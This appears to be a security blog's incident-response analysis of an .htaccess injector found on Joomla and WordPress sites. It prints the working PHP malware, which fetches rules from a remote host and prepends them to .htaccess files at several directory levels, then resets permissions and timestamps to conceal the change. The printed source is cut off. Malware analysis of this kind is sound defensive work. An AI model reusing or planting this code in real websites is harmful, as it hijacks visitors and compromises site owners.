.htaccess Injector on Joomla and WordPress Websites

During the process of investigating one of our incident response cases, we found an .htaccess code injection. It had been widely spread on the website, injected into all .htaccess files and redirecting visitors to the http[:]//portal-f[.]pw/XcTyTp advertisement website. Taking a Look at the .htaccess Injector Code Below is the code within the ./modules/mod_widgetread_twitt/ index.php file on a Joomla website. This code is responsible for injecting the malicious redirects into the .htaccess files: <?php echo'Wordpress ';$htac=file_get_contents('hXXp://recaptcha-in[.]pw/bash/x');$fl="./.htaccess";$lastData="";if(file_exists($fl))$lastData=file_get_contents($fl);if(!substr_count($lastData,"# BEGIN WORDPRESS")){$data=$htac."\r\n".$lastData;chmod($fl,0766);file_put_contents($fl,$data);touch($fl,filemtime($path));chmod($fl,0444);echo$page;};$htac=file_get_contents('http://recaptcha-in.pw/bash/x');$fl="../.htaccess";$lastData="";if(file_exists($fl))$lastData=file_get_contents($fl);if(!substr_count($lastData,"# BEGIN WORDPRESS")){$data=$htac."\r\n".$lastData;chmod($fl,0766);file_put_contents($fl,$data);touch($fl,filemtime($path));chmod($fl,0444);echo$page;};$htac=file_get_contents('http://recaptcha-in.pw/bash/x');$fl="../../.htaccess";$lastData="";if(file_exists($fl))$lastData=file_get_contents($fl);if(!substr_count($lastData,"# BEGIN...